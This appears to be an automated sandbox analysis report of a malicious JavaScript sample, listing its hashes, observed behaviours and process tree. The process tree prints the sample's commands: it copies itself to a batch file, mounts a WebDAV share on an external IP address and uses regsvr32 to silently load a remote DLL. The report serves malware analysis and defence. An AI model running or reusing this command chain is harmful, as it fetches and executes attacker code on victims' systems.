Analysis
-
max time kernel
124s -
max time network
132s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system -
submitted
08/07/2024, 18:56
Static task
static1
Behavioral task
behavioral1
Sample
129414081202625224.js
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
129414081202625224.js
Resource
win10v2004-20240704-en
General
-
Target
129414081202625224.js
-
Size
5KB
-
MD5
1083c024b02557224749c51f50b06a9d
-
SHA1
e951fab00ffcf65e15d7e67f9b3a76ab3e31961e
-
SHA256
2e2e639d7ee062b6094de0e2bd5225abce38390ef683f862309abfe8c9348fe8
-
SHA512
bb604848f46996433e6531fa0249b7b9d7933a3c5c50a36e1ceb91d4fee9cc6f2353ef7aa91c0a32d481fead9afb72c5d11af05cfae2e6c8a6314c89f88bbe2d
-
SSDEEP
96:u3nY6cF0M1awwwllOolKNwwllOi/hOLPSXKpQ3nahlDs3ea+gw3a3N0v3atkNv3J:u3nYfFk2llOoEllOi/eq3ahlDs3exr3t
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2416 wrote to memory of 2576 2416 wscript.exe 89 PID 2416 wrote to memory of 2576 2416 wscript.exe 89 PID 2576 wrote to memory of 4456 2576 cmd.exe 91 PID 2576 wrote to memory of 4456 2576 cmd.exe 91 PID 2576 wrote to memory of 3096 2576 cmd.exe 93 PID 2576 wrote to memory of 3096 2576 cmd.exe 93
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\129414081202625224.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2416 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\129414081202625224.js" "C:\Users\Admin\\eykish.bat" && "C:\Users\Admin\\eykish.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2576 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:4456
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\892.dll3⤵PID:3096
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4080,i,5019894817651309870,579021928995875068,262144 --variations-seed-version --mojo-platform-channel-handle=3852 /prefetch:81⤵PID:3248
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD51083c024b02557224749c51f50b06a9d
SHA1e951fab00ffcf65e15d7e67f9b3a76ab3e31961e
SHA2562e2e639d7ee062b6094de0e2bd5225abce38390ef683f862309abfe8c9348fe8
SHA512bb604848f46996433e6531fa0249b7b9d7933a3c5c50a36e1ceb91d4fee9cc6f2353ef7aa91c0a32d481fead9afb72c5d11af05cfae2e6c8a6314c89f88bbe2d